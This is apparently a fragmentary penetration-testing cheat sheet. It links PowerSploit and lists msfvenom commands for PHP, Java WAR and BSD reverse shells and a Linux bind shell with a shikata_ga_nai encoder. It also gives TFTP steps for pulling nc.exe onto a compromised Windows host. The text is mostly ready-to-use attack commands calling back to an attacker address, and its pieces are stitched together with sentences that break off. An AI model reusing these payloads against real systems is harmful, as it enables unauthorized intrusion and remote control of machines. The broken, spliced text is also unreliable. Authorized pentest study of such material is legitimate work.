what are the odds of gaining initial access and doing some reconnaissance using PowerShell? sounds interesting right? lets test this out. powershell empire project is just simply superb resource if you want to dig into it more. Download link: https://github.com/PowerShellMafia/PowerSploit/ Download from Github and drop the folder into the modules
Scenario: Having initial access to webapp, or system and found credentials that can be used to run commands(maybe pentester have initial reverse shell through webapp) and also be able to create admin account on machine but all ports are locked out except web ports. following script can be helpful to
This post is to only serve as instructions for my own, should you like it and use it? please bear in mind it does not come with any warranty. Thanks to absolomb blog for idea, i am only trying to use his stuff and improve where necessary to my advantage.
PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php Java WAR reverse shell msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war Linux bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai Linux FreeBSD reverse shell msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o
File Transfers limit commands on shell to be non-interactive https://blog.netspi.com/15-ways-to-download-a-file/ TFTP Windows XP and Win 2003 contain tftp client. Windows 7 do not by default tfpt clients are usually non-interactive, so they could work through an obtained shell atftpd –daemon –port 69 /tftp Windows> tftp -i 10.10.10.10 GET nc.exe FTP